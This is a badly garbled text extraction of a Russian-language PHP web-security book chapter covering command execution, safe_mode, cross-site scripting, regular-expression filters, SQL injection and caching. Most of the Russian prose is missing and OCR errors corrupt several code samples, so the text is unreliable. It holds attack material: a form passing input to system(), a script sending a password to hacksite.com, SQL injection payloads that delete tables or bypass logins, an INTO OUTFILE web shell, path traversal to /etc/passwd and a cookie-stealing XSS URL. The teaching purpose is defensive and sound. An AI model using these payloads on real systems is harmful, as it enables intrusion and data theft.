. , ,
,

.
,

, . , /var/www/html/admin,
index.php /var/www/html/,
../index.php.
.. / . / .
3.5 , , , , . ,
.
,
. ,
systemf), . ,
, .
system ,
, .
135
, ,
system)):
<form action="syst.php" method="get">
Command: <input name="sub_com">
<BR><input type="submit" value="Run">
</form>
<PRE>
<?php
print("<B>$sub_com</B>");
system($sub_com) ;
?>
</PRE>
- . Web-
Linux, :
cat /etc/passwd
,
. ,
, Web-.
, . , . system)),
. .
exec (). ,
, . , , , . ,
:
print(system($sub_com));
passthrui), system)),
. , p a s s t h r u o
.
, ,
shell_exec (). :
print(shell_exec($sub_com));
- .
('). , ;
136
1. Is al
:
print (' I s - a l ' ) ;
, , 3.4.3.
3.4.3.

, . , , php.ini, Linux /etc.

, , safe__mode (
off). , . ,
. ,
,
safe_mode,
, .
, , , , safe_mode .
, , safe_mode:
safe_mode_gid
,
( ), .
safe_mode, a safe_mode_gid ,
,
. . safe_mode safe_mode_gid , . ,
;
safe_mode_exec_dir , , .
,
s y s t e m ( ) , e x e c () . .;
137
safe_mode_aiiowed_env_vars
, . , _. ,
;
saf e_mode_protected_env_vars
,
. LD_LIBRARY_PATH.
,
_, _
.
disabie_functions
.
(systemO, exec(), passthruO, shell_exec (),
), .
PHP- ( FTP- HTTP-). ailow_url_open
(), . , ailow_uri_open off. , , , . ,
,
.
, aiiow_uri_open ,
,
.
.
f open /etc/passwd,
.
, php.ini
open_basedir .
3.5.
? :
HTML- JavaScript;
, .
138
, .
JavaScript ,
, . :
,
.
;
,
;
,
.
, . -, JavaScript . -,
, . :
1. .
2. JavaScript-.
3. , .
action ,
URL .
,
. , .
PHP- JavaScript :

( , );
, , ;
;
, ,
;
,
, .
,
, .
,
, .
139
(
JavaScript) , JavaScript.
, . ,
.
JavaScript,
,
.
.
,
, JavaScript- PHP-,
. ,
JavaScript ( ) .
JavaScript , .
, , ,
.
, . , , , . , submitl.php :
<form action="sutmitl.php" method="get">
<input type="sufcmit" name="sub" value="Go">
</form>
<?php
print(" $UserName");
?>
,
. , . , "<B>Text<B>". ,
"Text". , HTML- , , JavaScript, , , .
HTML-
htmispeciaicharsO. ,
, < > ⁢
&gt,- . "<>>"
140
"<B>Text<B>", "Text" . ,
:
$out=htmlspecialchars($UserName);
print("$out");
<script>.
,
<script> . ,
< s c r i p t >? , , ,
. ,
, :
<SCRIPT LANGUAGE="JScript"> </SCRIPT>
, < &lt,- < &gt, !

, JavaScript ,
. ? .
, , ,
. , , ,
. , Web- JavaScript-. :
<SCRIPT>
var pass=prompt(' ', ' ' ) ;
location.href="http://hacksite.com/pass.php?pass="+password;
</SCRIPT>
,
http://hacksite.com/pass.php.

.
(Java, JavaScript . .) .
, Web- <> ( ). :
< HREF="http://hacksite.com/register.php">
<>
register.php hacksite.com.
, . , ,
-
141
, , .
URL .
,
, .
, , ,
.
.

, ,
. , , ,
. . ,
.

, 3.6.
, , .
? , , "" (<), "" (>), (:), (%),
(\) (/),
.
,
. ,
.
, ,
. :
1. . ( ).

die (), .
2. , ,
. ,
<i>, <> . . , , , , , [i]
<i>, [] <> . . ,
( ), , .
142
3. , .
, .
, .
, .
4. . ? ,
Web-, . ,

. , , .
, , 5.
,
.
.
.
, ( ) ],
, .
,
, %.
, ?
, - .
. , %20 , ,
ls%20-a
Is -a
; %2 0, , .
, , : TestParamN, N . , , .
,
.
,
. ,
.
143
,
, , ,
. , , " ". ,
2.0, 1.0 ,
, ,
.

. , ,
, , .
, .
, . , , ( ):
31;
12;
1930 ( ,
75 ) , .
, ,
2 ,
.

, if.
3.6.
(regular expressions) ,
,
. , . .

POSIX Perl.
,
. , , , .
( 3.6.5).
144
,! 3
, ,
, , . ,
. , .
3.6.1.
, , . , , .

. :
int
ereg(
string pattern,
string string
[, array regs] )
, :
pattern ;
s t r i n g , ;
regs , .
,
. .
eregi
eregi () (), . , .
ereg_replace
preg_repiace(),
2.9, ,
:
int ereg_replace(
string pattern,
145
string replacement,
string string)
:
pattern ;
replacement ;
s t r i n g , .
eregi_replace
eregi_replace() ereg_replace(), . .
split
s p l i t . :
array split(
string pattern,
string string
[, int limit] )
:
p a t t e r n ;
s t r i n g , ;
limit .
spliti
s p l i t i s p l i t ,
.
3.6.2.
, "BI" HTML- <><1>:
$text= "BI Hello world from PHP";
$newtext = eregi_replace("BI", "<Bxl>", $text) ;
echo($newtext);
,
.
146
. , "BI" "IB".
:
$text= "BI Hello world from PHP";
$newtext = eregi_replace( "BI | IB", "<BxI>", $text);
echo($newtext);
,
. , :
$text= "BI IB IBB Hello world from PHP";
$newtext = eregi_replace("Bl|lB|lBB",
"replaced", $text);
echo($newtext);
, . , 0 9.
: [0123456789].
?
. , . , ,
. " ". ,
, [0-9], , [a-z].
. , [a-zA-z].
, . ,
, , :
[0-9a-zA-Z-_ ]
, , ,
. \
, , F J: [ A F J ] .
X:
$text= "99fl7s87";
$newtext = ereg_replace("[0-9]", "X", $text);
echo($newtext);
xxf xxsxx.
. , "XX"
, 50.
: [0-4] [0-9]:
$text= "99fl7s87";
$newtext = ereg_replace("[0-4][0-9]", "XX", $text);
147
. 0 4, 0 9. ,
, , 00, 49.
17.
. , , , +.
.
(*), ,
.
,
, . , ?.
.
:
{[, []]}
, . , , 2 5 : {2,5}.
, ,
, . , : {3}.
, ,

, . , , 5 : {5, }.
:
$text= "2511111111";
$newtext = ereg_replace("51{4,}", "XX", $ t e x t ) ;
"2511111111" "5",
, 4. "X". "2".
. ,
, ( , ) "bed". , : A (bed).
? ,
ereg () ,
, :
$date= "01/09/2005";
$newtext =
$date, $regs);
print("<P> Param 0 = $regs[O]");
print("<P>Param 1 = $regs[l]");
print("<P>Param 2 = $regs[2]");
print("<P>Param 3 = $regs[3]");
$date .
ereg (). . . -9]{1,2}):
, 0 9. . 1 2 .
, .
,
2 4. - , . . .
, :
Param 0 = 01/09/2005
Param 1 = 01
Param 2 = 09
Param 3 = 2005
, .
. ereg
. , (), .
, : 99/99/9999. , 31, 12.
(
//):
][0-9])
: [1]?[0-9]. , :
[1] ? , .
[0-9] 9.
, ,
: 19/39/2099. ,
.
149
,
. :
. , ,
script skript ( ).
.
;
, ,
. ,
, : ;
. ,
, z: z$.
, ,
. , : "[B]Hello[/B] world
from [B]PHP[/B]". []
HTML- <>? , :
$text= "[B]Hello[/B] world from []PHP[/]";
$newtext = ereg_replace("[]", "<>", $text);
[] ,
. , . :
$text= "[B]Hello[/B] world from [][/]";
$newtext = ereg_replace("\[\]", "<>", $text);
$newtext = ereg_replace("\[/\]", "</>", $newtext);
echo ($newtext);
,
,
. ? ,
. ,
. , ? , ?
- , , HTML- . , ,
, .
, -
.
, .
150
, . ,
, , . , :
([a-zA-Z0-9\._\-]+@[a-zA-Z0-9\._\-]+(\.[a-zA-ZO-9]+)+)*$
, :
( [a-zA-zo-9\._-]+ @ . ,
,
+;
[a-zA-zo-9\._-]+ , ,
, ,
;
(\. [a-zA-zo-9]+) *$ . .
, . , *.
, . ,
, , . ,
,
. :
[ [ : d i g i t : ] ] , . .
[0-9];
[ [: alpha: ] ] , . .
[A-za-z];
[[:ainum:]] , . .
[A-za-zO-9].
, X:
$text= "13hkl32131h";
$newtext = ereg_replace("[[:digit:]]", "X", $text);
3.6.3. Perl
3.6.2 , Perl, . Perl, ,
151_
, . , .
, Perl- . , . ,
.
: ,
, ,
. ,
Perl , .
Perl . ,
hacker: /hacker/.
:
//
,
. Perl i .
.
i - . ,
/hacker/i hacker, HACKER, HacKer . .
, .
,
. :
/
hacker
/
#
#
D m , , .
.
Perl
. . 3.1
.
3.1. Perl
152
3
3.1 ()
\Z
\z
\d
\D
\s
\S
( 13)
( 10)
\t
( 9)
\w
, , ,
\W
, ,
\xhh
. , \41
, \ , , , .
. ,
. :
/\d\d\d/
:
/\d{3}/
, ,
/\d\w\d/
. , , 3 5 , 3 7 .
:
/[A-Z]{3,7}\s\d{3,4} /
, \ , .
, Perl-
, .
153
Perl ,
. ,
: /[--ZJ/.
, ,
, X preg_repiace ():
$text= "13 EK_-hkl3FR31h";
$newtext = preg_replace("/[0-9A-Z]/", "X", $text);
echo ($newtext);
. X ,
1, 2 3, / [ 123] /:
$ text = "13_54hkl3 FR3lh";
$newtext = preg_replace("/[123]/", "X", $text);
echo ($newtext);
, Perl
.
3.6.4. Perl

Perl. , ,
3.6.1, .
preg_replace().
preg_match
,
ereg() . :
int preg_match(
string pattern,
string subject
[, array matches] )
, :
pattern ;
subject , ;
matches ,
. , . .
6 . 1315
154
, . , $server ,
:
$r=preg_match(
V([a-zA-Z0-9\._-]+@[a-zA-Z0-9\._-)+(\.[a-zA-ZO-9]+)*$/",
$server);
if (l$r)
die(" ");
preg_match_all
preg_match (), ,
.
:
int preg_match_all(
string pattern,
string subject,
array matches
[, int order] )
, :
pattern ;
subject , ;
matches ,
. , ;
order . :
PREG_PATERN_ORDER .
;
PREG_SET_ORDER
matches, .
, true, false.
155
preg_ split
preg_spiit() , s p l i t . :
array preg_split(
string pattern,
string subject
[, int limit
t, int flags]] )
:
pattern ;
subject , ;
limit ;
flags PREG_SPLIT_NO_EMPTY. .
3.6.5.
,
.
, .
PHP- , Perl. ,
, ,
.
, Basic , . ,

, , .
,
Perl - , .
, .
, .
, .
.
156
3.7.
3.5 , , , . ( 3.5) ,
, Perl.
, .
, ,
.
, ,
. , , , .
" , "?
, , -
. , HTML <>, <i>, <>. , :
$id=ereg_replace("<SCRIPT>|<VBSCRIPT>|<JAVASCRIPT>", "", $id);
, ? , Web ,
, , . , :
<?php
$Str = "<I><STRONG>Hello <B> World<SCRIPT>";
$str=ereg_replace("<[A-Z]{1,}[1]>", "", $str);
print($str);
?>
, <>, <i> <>. HTML

, ,
[ A B I U ] .
, ,
, . ,
: , , , ,
, . , :
,
.
157
. , :
$str=ereg_replace("Pa-zA-Z]", "", $str);
, Z
. ,
, .
.
.
,
:
$str=ereg_replace("[]", "", $str);
, ,
.
, ,
, .
$str=ereg_replace("[ 0-9.]", "", $str);
, , ,
:
$str=ereg_replace("[ 0-9]", "", $str);
, , . ,
:
$str=ereg_replace("<[A-Z]{1,}>"/
"", $str);
bbcode. ,

"bb" []. PHP-
[] <>.
[] <> .
[ ] < > .
[SCRIPT], <SCRIPT>. , . . [] <>.
, .
.
,
.
, , .
158
,
. :
<?php
,

?>
, :
$param = preg_replace(" ", "", $param);
$param , . , .
, preg_repiace() ,
, :
function prepare_param($param)
{
return ereg_replace("["0-9.]", "", $param);
$name = prepare_param($name);
,
. , ,
(,
). ,
.
,
,
.
( ) , .
159
3.8.
,
.
.
,
, .
,
, .
3.8.1.
:
<?php
if (mysql_connect("localhost", "username", "password")==0)
die("Can't connect to Database Server");
mysql_select_db("database");
$result=mysql_query("SELECT * FROM table");
$rows=mysql_num_rows($result);
print($rows);
mysql_close();
?>
, Web- . mysql_connect (), :

, .
, Web-,
localhost.

, MySQL:
MySQL , , . .
, ,
IP- ,
.
160
, ,
MySQL root . Linux . ,
, .
,
, MySQL .
mysql_select_db(), . SQL- .
mysqi_query (), , SQL-. SELECT, , . SQL, 1
.
, mysql_query (),
mysql_num_rows (). , , .

.
mysql_ciose (). ,
, . ,
.
, -
, .

mysqi_fetch_row(). , SQL-
.
:
while (list($id, $name) = mysql_fetch_row($result))
{
print("$id - $name");
}
161
3.8.2. SQL Injection

SQL Injection,
SQL- URL
, . SQL- ,
, , :
DELETE
FROM _

SQL-92, .
, SQL Injection, . .
, . , Users, :
"id", "name", "password". :
SELECT *
FROM Users
WHERE id = $id
"id" .
URL cookie,
, .
, .
. $id
OR name="", :
SELECT *
FROM Users
WHERE id = 10 OR =""
, "id" 10,
, "". , . , , ,
, . , "id" , ,
, 0 9. $name ,
:
<form action="dbl.php" method="get">
<input name="id">
162
</form>
<?php
$id=preg_replace("/rO-9]/",
" " , $id) ;
print('SELECT * FROM U s e r s WHERE i d = ' . $ i d ) ;

?>
dbl.php
Web-. , .
OR ="" . , , :
$id=preg_replace("/[0-9]/",
"",
$id);
$id ,
0 9, . ,
, 10, .
. ,
"name". ,
? , , :
<form action="db2.php" method="get">
<input name="name">
</form>
<?php
$name=preg_replace (" / [â-zA-ZO-g ] /i",
"", $name);
print('SELECT * FROM Users WHERE name='.$name);
?>
, , . , , :
10
OR name="",
OR =, , .
, ,
.
"/[ ---9 ]/i"
, . ,
163
[ ],
. , SQL-,
. , :
.
.
. . ,
"id" "age", :
SELECT * FROM Users WHERE id='.$id
$id OR age=20,
, :
SELECT * FROM Users WHERE id=10 OR age=20
, :
SELECT * FROM Users WHERE id=10 OR age20
, ,
, .
. SQL ,
. ,
:
SELECT * FROM Users WHERE name=$name AND id=$id
, $name :
:
SELECT * FROM Users WHERE narae= AND id=$id
, , ,
:
SELECT * FROM Users WHERE name=
,
, .
. . , . ? :
SELECT * FROM Users WHERE id=$id
, $id :
10;DELETE FROM users
164
, :
SELECT * FROM Users WHERE id=10;DELETE FROM users
:
SELECT * FROM Users WHERE id=10 DELETE FROM users, . .
, .
, ,
. :
SELECT * FROM Users WHERE id=$id AND =''
AND ='',
, $id
:
10,-DELETE FROM u s e r s - -
:
SELECT * FROM Users WHERE id=10;DELETE FROM users AND =''
, .
, . . /*. ,
. , /*. , /* */,
,
(*/) ). :
SELECT * FROM Users WHERE id=10;DELETE FROM users/* AND ='|
AND ='' ,
/*. , (*/) , , .
, /* */ . ,
:
SELECT *
FROM Users
WHERE id=10
AND name=''
, ,
.
id , :
SELECT *
FROM Users
165
WHERE id=10;DELETE FROM users

AND =''
,
, .
/*,
:
SELECT *
FROM Users
WHERE id=10;:DELETE FROM users /*
AND =''

.
,
SQL: i n s e r t , update, d e l e t e , or, and . .
, . ,
. , , SQL:
<?php
$name=preg_replace("/[--0-9 ]|insert|delete|update/i",
"", $name);
print{'SELECT * FROM Users WHERE name='.$name);
?>
SQL UNION, . ,
:
SELECT ,
FROM
WHERE id=$id
,
. $id ,
:
SELECT ,
FROM
WHERE id=l
166
UNION
SELECT ,
FROM
, . , UNION ,
,
.
, SELECT
,
,
.
, UNION,
, .
SQL- ,

. , , , .
,
. MS SQL Server (
) char (),
, . ,
0x13, 0x27.
, , :
=(0x13)++(0x27)
, char (),
, . char()
( ) :
<?php
$name=preg_replace("/Pa-zA-Z0-9 ]|char/i",
"", $name);
print('SELECT * FROM Users WHERE name='.$name);
?>
,
i ' = 1 ( , ). ? ,
:
SELECT *
FROM _
WHERE ='$1
167
, $ ,
SQL. :
' OR ' 1' = '1
:
SELECT *
FROM _
WHERE ='' OR '1'='1'
WHERE OR, , . , ' 1' = 1 ' . , , .

SQL- 1 = 1,
. , 2 = 2,
, ,
(, 99 100) 1 = 1. , .

, . ,
,
. , . , :
SELECT *
FROM
WHERE user=$user
AND pass=$pass
, ,
, , . :
SELECT *
FROM
WHERE user=$user
AND pass=$pass OR 1=1
,
, .
. , :
SELECT *
168
FROM
WHERE i d = l
SELECT *
FROM
WHERE id='1'
"id" 1, . , , , ,
. ? ,
1 , . SQL, :
SELECT *
FROM
WHERE id= '_?%='
, .

. , .
. ,
SQL Injection. :
SELECT *
FROM
WHERE id='l' OR 1='1'
1 OR I= ' 1, 1 , SQL-.
.
CSS (Cross-Side Scripting, ), 3.11.
3.8.3.
SQL- . , PHP- :
SELECT '<?php system('') ?>' INTO OUTFILE 'shell.php'
,
.
169
, , .
SELECT '<B>You hacked</B>' INTO OUTFILE 'index.php1
SQL- INTO OUTFILE

. , , ,
.
3.8.4.
, . ,
,
. ,
URL.
, ,
Web-.
, ,
, . URL
:
http://www.sitename.com/index.php?id=N
URL id, . (
id), ,
.
, :
1. PHP- .
2. , .
3. Web-.
4. .
, Web- URL id,
SQL, . , SQL-, :
;
.
170
SQL- , ,
, (. .
).
, , , , :
function prepare_param($param)
{
return preg_replace("/["a-zA-Z0-9
]|insert|delete|update/i",
"", $param);
}
mysql_query("SELECT * FROM Users WHERE name=".
prepare_param($name));
,
,
prepare_param (). ,
, .
. , , .
, (, . .).
,
:
SELECT *
FROM Users
WHERE Name=$Name AND pass=$pass
,
.
, .
, .
.
, , md5,
cookie . , -,
.
171

.
:
$query = DBQuery("SELECT * FROM Users WHERE (name = '$name');
$users = mysql_num_rows($query);
if (!$users)
die(" ");
$user_data = mysql_fetch_array($query);
if ($pass = $userd[pass]))

, . .
, , ,
. ,
if .
DBQuery , ,
:
function DBQuery ($var)
{
$query = mysql_query($var);
if (!$query)
{
//
exit;
}
return $query;
}
SQL Injection. 5.3.3

.
3.8.5.
, ,
. URL-, -
. URL ,
172
, , .
, URL,
, .
URL :
SELECT *
FROM
WHERE ValidURL=$url
,
, , URL, .
$uri ( URL) . , , .

, URL PHP- ,
? & . ,
, URL .
,
.
, , , URL id, .
$uri :
"http://www.sitename.com/index.php?id=[0-9]{1,}"
,
, .
,
URL ,
. ,
, - .
3.9.
, .
, , 3.4.1. , .
2.14, .
173
, , ,
:
1. . , ,
. ,
. Windows , ,

. , ,
, .
2. ,
( ), .
, , ../../../../../etc/passwd
.
3. .
, , .
, ,
. , .
, , . , , .
.
,
,
.
3.10.
(8 )
, , . ,
, , ,
? ,
, , .
174
, , . , ,
. , ,
, ,
,
,
. , .
,
.
,
,
.
, .
,
. ,
.
, . ,
- ,
. .
.
,
, . , .
, . .
3.10.1.
.
, . XOR .
.
, :
. ,
. ,
? ,
, , -
175
. , ,
e-mail . , , , .
( ),
, , .

.
, . , . ,
- , , , .
, , ,
.
DES, 3DES, Blowfish, CAST 128 . . mcrypt_ecb (),
:
, . libmcrypt,
, , :
MCRYPT_DES - DES;
MCRYPT_3DES - 3DES;
MCRYPT_BLOWFISH - Blowfish;
MCRYPT_CAST128 - Castl28;
MCRYPT_CAST256 - Cast256;
;
;
. :
MCRYPT_ENCRYPT ;
MCRYPT_DECRYPT .
DES:
<?php
$^" ";
$text=", ";
176
$str=mcrypt_ecb(MCRYPT_DES, $key, $text,

MCRYPT_ENCRYPT);
?>
$str
$text. ,
, , MCRYPT_DECRYPT:
<?php
$decrypted_str=mcrypt_ecb(MCRYPT_DES, $key, $str,
MCRYPT_DECRYPT);
3.10.2.
, :
. ( Linux
OpenSSL)
. ,
. ,
,
.
.
. , , ,
, ,
,
. , 1024 , .
Web- , .
3.10.3.
, ,
. ,
,
. ?
. , ? : ,
177
, .
, ,
.
md5 ().
, :
$md_pass=md5($password);
$md_pass $password. ,
:
if
(md5($password)== $md_pass) and ($username==$name)
//
3.10.4.
. , ,
. Web-, ,
.
md5 () ,
, . ,
. ? .
. , , , ?

- , , .
, . ,
. ? .
,
, , .
, , , . .
, .
, , , , . ,
178
.
. ,
, ,
. , . ,
, 70% . , : , , ,
. , ,
,
. .
,
.
,
.
.
, . ,
, . ,
" ", e-mail,
. , ,
. ,
. ,
. , , , .
,
? . , , , Whois, e-mail
. .
. , Web- , ,
- . DES . MD5.

. , ,
.
179
, ,
- .
,
.
. ,
3DES, md5 . . ,
,
, ( ) IP-.
3.11. Cross-Site Scripting

Web- Cross-Site
Scripting. , Web-
HTML-. cookie
.
, .
Web-,
, . ( ). ,
.
Web-, , ,
. ,
.
Web-. ,
.
htmlspecialchars(),
3.5. ,
. , , , < &lt,-.
, .
,
.
180
(javascript, VBScript .), ,

:
function RemoveScript($r)
{
$r = preg_replace("/javascript/i", "java script ", $r) ;
$r = preg_replace("/vbscript/i", "vb script ", $r);
return $r;
}
He . .
, .
3.12.
,
(flood). ? ,
,
. . - ,
.
3.12.1.

IP- . :
1.
.
, , , , .
,
REMOTE_ADDR:
$_SERVER["REMOTE_ADDR"]
2.
IP-, . .
3. , IP- . , , "
".
, "" ,
. , -
181
, . , , .
3.12.2.
.
, .
, ,
cookie, , , .
www.download.com , : ,
.
, .
(. . cookie-) .
/
, , .
cookie, - .
, , , (. . 1 2).
, ,
:
, cookie, ,
;
,
, ,
.

, , ,
cookie . , .
, .
IP- , .
, . -
182
" " [2].

.
IP-
. , .
IP- .
, . , .
- , IP- , .
? , , . -
, .
- , , .
,
- NAT- (Network Address Translation, )
.
IP-, .
,
. , ,
.
IP-
, .
, ,
. ,
.

. , , . , , ,
e-mail ( ), , , :
1. . , , .
2. ,
.
3. .
, , , .
183
, ,
. , ,
, . , . .
,
. , , .
3.13.
: HTTP_REFERER.
, . env.php :
<form action="env.php" method="get">
<> - </>
<BR>TeKCT: <input name="server">
<BR><input type="sufcmit" value="OK">
</form>
<?php
print($HTTP_REFERER);
?>
, Web-
HTTP_REFERER. .
,
, .
- .
HTTP_REFERER .
Web- http://192.168.77.1/env.php,
192.168.77.1 IP- , Linux
Web- Apache+PHP.

action , Web:
<form action="http://192.168.77.1/env.php" method="get">
<> - </>
<BR>TeKcr: <input name="server">
<BR><input type="submit" value="OK">
184
</form>
<?php
print($HTTP_REFERER);
?>
Web-
, , POST.

. , HTTP_REFERER ,
192.168.77.1. , :
<?
if
(isset($server))
if
(!(" 192\.18.8\.88"))
{
die("He ");
3.14.
Web-
. , Web- ,
,

, .
Web-. , ,
,
5.3.3 , .
, ,
-
. , . Web- , ,
185
,
, .

, .
, SQL Injection, , ,
. ,
, . .
, . ,
? , :
, , , IP- .
, . ;
, IP- , ;
. , , . .;
. Web-, , ,

.
, , . .
, . , , , ,
,
. . ,
. , Apache ,
, .
3.15.

? :

, , ,
7 3. 1315
186
?
,
;

. , , ,
.
,
. .
3.17.
- ,
Web-.
/, . , .
:
.
. . .
. , ,
, , .
, .
, . , ,
.
, .
- ,
.
, ,
.
, .
IPB (Invision Power Board). .
, -
187
,
. , .
, . - , . , , .
,
.
,
. ,
. , ,
(
). .
3.18. REQUESTJJRI
2.12.1 , $REQUEST_URI. He , . ,
:
<?
print("<form
action=\"http://".$SERVER_NAME.$REQUEST_URI\"
method=\"post\">");
//
print("<input type=\"submit\" value=\"Submit\">");
print("</form>");
?>
, $SERVER_NAME $REQUEST_URI. , URL , . . ,

URL . , .
, URL :
http://yoursite/index.php?"Xscript>alert(document.cookie)</script>
,
cookie. , cookie-, ,
188
, ,
, JavaScript-.
$REQUEST_URI , , < >.
3.19.
Web-, ,,
,
. . : ,
, . .
,
.

.
, , .
, , .
,
,
, . , ( cookie, GET POST, ),
. , . , , , .
, .
. ,
"" , , .
,
,
. " ".

,
.
, . : "
, . ,
". , .
10 , .
,
, ,
. 7090- ,
, . .
Doom, . -
. ,
, . ?

. , .
, - ,
. , , - , .
190
4.1.
,
. , .
. , ( Listl). :
1. List2,
.
2. L i s t l .
3. List2.
4. , List2 . , List2.
5. 3 4, . List2
, ,
.
6. L i s t l ,
3.
, ,
. Listl,
, List?. , .
, .
, . ,
, , .
- ,
.
,
.
,
: 1, 2, 3, 4, 5, 6, 8, 7, 9.
8 7 ,
, . ? .
-
.
191
, , .
,
:
1. .
2. false.
3. .
4. . X>Y, TO true. Y.
5. , 2.
6. , .
true, ,
. false, , .
, .
. 7 8
, , , , .
,
, - .
,
.
, . ,
,
. , ,
.
,
. ,
Pentium 4, , Hyper Threading ,
.
,
. , .
192
4_
4.2.
,
. , ,
.
,
Pentium 4 - 256 /. , , . ? , . ,
.
, , . , ,
.

. , . , , . ,
, . , :

, 100
;
= +1;

, . 5 10 ,
, .
, 100 . ,
, 100 :

;
, 100
= +1;

193
, , .
,
.
4.3.
, , , . SQL,
, .
, , .

() , - SQL 1992 .
, , , , , .

, .
MS SQL Server MySQL, Oracle.
, -, , .
( )
(). , . .
.
, ,
, , ,
.
, .
, .
4.3.1.
, SQL-
. . ,
194
SQL, , , . "",
-.
SQL. , , MS SQL Server Transact-SQL, Oracle PL/SQL, .
, .
,
.
, . .
, SQL- , ,
.
.
, . ,
:
1. .
2. .
3. .
4. .
,
. ,
, .
.

.
:
SELECT *
FROM TableName
WHERE ColumnName=10
SELECT *
FROM TableName
WHERE ColumnName=20
.
, coiumnName 10,
195
, 20. ,
. , , , .
, . SQL ,
.
, ,
paramx, :
SELECT *
FROM TableName
WHERE ColumnName=paraml
, , parami, , .
, (
). - , , .
.
, .
, ,
. , , ( ).
. , .
, .
, , .
,
,
. ,
, ,
.
. SQL , (, , ).
, ,
196
, . .
, .
, , .
.
. SELECT,
WHERE.
SELECT FROM.
: , SELECT
FROM WHERE.
.
, ,
. status
, . :
SELECT *
FROM tbPerson p
WHERE .idStatus=
(SELECT [Keyl] FROM tbStatus WHERE sName='')
.
, WHERE .
tbPerson, ( ).
, ,
, ,
. . :
SELECT [Keyl]
FROM tbStatus
WHERE sName=''
:
SELECT *
FROM tbPerson p
WHERE p.idStatus=nony4eHHbM
197
, SELECT FROM.
:
SELECT *
FROM tbPerson ,
(SELECT [Keyl] FROM tbStatus WHERE sName='') s
WHERE p.idStatus=s.Keyl
FROM. . ,
, .
.

(, -).
SELECT
, :
SELECT *
FROM tbPerson p, tbStatus s
WHERE p.idStatus=s.Keyl
AND s.sName=''
.
, . , :
code 1 2
FirstName
LastName
.
: 1 0. 1 info, . 0,
info.
:
SELECT *
FROM Info i,
(SELECT * FROM A, Info WHERE a.LastName= info.LastName) s
198
WHERE Code=0
AND a.LastName=s.LastName
:
SELECT 12.*
FROM Info 11, A, Info 12
WHERE il.Code=l
AND
il.LastName=A.LastName
AND
il.LastName=i2.LastName
AND i2.Code=0
info info-A-info. , ,
, SELECT.
. ,
MS SQL Server :
Declare id int
SELECT @id=[id]
FROM tbStatus
WHERE sName=''
SELECT *
FROM tbPerson p
WHERE p.idStatus=@id
@id. ,
tbPerson.
, . , .
,
, .
. , , .
, . , , , .
199
4.3.2.
.
.
, .
, , , .
, , 255.
, . ,
, , . ,
, ( Linux ) ,
.
, ,
,
, .
, ,
. , 10 , 50 .
100 000 4 .
10? . 100 , , TEXT MEMO. ,
, .

. , .
, , . ,
.

. ,
, ,
- , .
200
. ? . ,
. ,
,
. , , . ,

, , .
.
, .
, . ,
,
, ,
.
Web-
MySQL.
OPTIMIZE,
,
, , . .
:
OPTIMIZE TABLE name
name , .
, .
, .
? ,
. , , 90% ( )
,
. , .
, .
, . , . , ,
, .
201
4.3.3.
. .
. yahoo.com google.com "". ,
690 000 000 ,
0,05 .
, ? ,
google.com, , .
, Google 100 .
, , , , ,
. 100 (690 ),
, 69 .
,
. ?

.
?
, . .
69 , ,
10 30 ( ). ,
:
1. , . :
SELECT Count(*)
FROM TableName
WHERE
,
4 . .
2. . , N .
, N+1 N+N . :
N , -
202
. ,
;
N ( ) , , , 69 .
MySQL
LIMIT:
SELECT *
FROM TableName
LIMIT Y, N
Y , , , N . , 11 25, :
SELECT *
FROM TableName
LIMIT 11, 15
, 50, N
1:
SELECT *
FROM TableName
LIMIT 50,
-1

, .
4.3.4.
,
, . ,
. , (Oracle MS SQL Server)
,
.
,
.
. ,
, ,
.
(, MS SQL Server) , -
203
. MS SQL Server
(. 4.1.). , .
j NOTEBOOK
ffc- RanovCRM
s U-
>
ffl L J System Tatfv
Query is C--ery ^ ( ! * ^ ! " * eo the b*cchi

Query tex;:: 3EICT| _ ;<ifcg;. Cauchara}
j temueb
2 j Common Object*
Clustered Iwtex Scan

dutteree index, entirely or on'/ a range.
_lj Date and T W F u f ' ^ j
;_J Meiaoaia Functia-
Physical operation:
Logical operation:
Row count
t * t i mated row t i l t :
I/O cost
IPUcosb
3rd g | aasutai Ran |glJ -Ie CP
iber of executes;
Cost
Subtree cost:
Estimated row count
Cluster ed Iduex Scan

Clustered Index Seen
0,000000
' 5,00
:"' MOTEBOCK'AdnwietrsMf {5:} 'pubs :'0:00:00
i23roi
. 4.1. Query Analyzer

MySQL ( ), . ,
, SELECT
EXPLAIN, :
EXPLAIN SELECT *
FROM TableName
, :
table , ;
type . , . :
system , ;
204
eq_ref
;
ref
. , ,
, ;
range
;
ALL . , , ;
index
, ;
possibie_keys , .
, ;
key possible_keys ,
, ;
key_ien ;
ref WHERE, ;
rows ;
extra .
. , .
, .
4.3.5.
, , .
? ,
, ,
. ,
.

. ,
.
205
. , MySQL
, ,
.
.
, ,
. . , . ,
, .
4.4.
, , , , PHP-. , ,
-.
4.4.1.
,
. ob_start (),
ob_end_fiush().
(, p r i n t )
, . ob_end_flush().
ob_end_fiush() , .
, :
<?php
ob_start() ;
//
ob_end_f lush () ,?>
. :
ob_get_contents () ;
ob_get_iength() .
206
, .
ob_start<), !
ob_gzhandler:
<?php
ob_start('ob_gzhandler');
//
?>
grip
. , . 50% , , , . , ,
.
, , . 70%, ,
.
4.4.2.
Web-

, . , ?
, 100
, .
.

, .
, . , .
Web-, ,
.
, , . ,

.
, , 4.4.1, .
207
,
. 4.1.
I 4.1. Web-
<?php
//
function ReadCache($CacheName)
{
if (file_exists("cache/$CacheName.htm"))
{
require("cache/$CacheName.htm");
print("<> ");
return 1;
}
else
return 0;
//
function WriteCache($CacheName, $CacheData)
{
$cf = @fopen("cache/$CacheName.htm", "w")
or die ("Can't write cache");
fputs ($cf, $CacheData);
fclose ($cf);
Ochmod ("cache/$CacheName.htm", 0111);
//
if (ReadCache("MainPage")==1)
exit;
ob_start() ;
print("<><> CTpaHnua</Bx/CENTER>")
print("<> ");
WriteCache("MainPage", ob_get_contents());
ob_end_flush();
208
.
Readcachet).
, ,
Web-. ,
MainPage, \
.
, Readcache ().
.
, require
1. , .
. Readcache () 1,
. , .
o b _ s t a r t o , ,
.
ob_end_fiush(), , ob_get_contents (). writecacheO.
, .
, .
ob_get_c on tents ().
0777, , :
Schmod ("cache/$CacheName.htm", 0777);
. ,
.
,
ReadCache () W r i t e C a c h e O
i n c l u d e d ,
.
.
, , , :
<?
include('func.php');
//
if (ReadCache("Contacts")==1)
exit;
ob_start();
209
print ( "<CENTERxB>KoHTaKTbi</Bx/CENTER>" ) ;
print("<> : horrific@vr-online.ru");
WriteCache("Contacts", ob_get_contents());
ob_end_flush();
?>
func.php,
ReadCache () WriteCache ( ).
, ReadCache ()
WriteCache (). .
, -
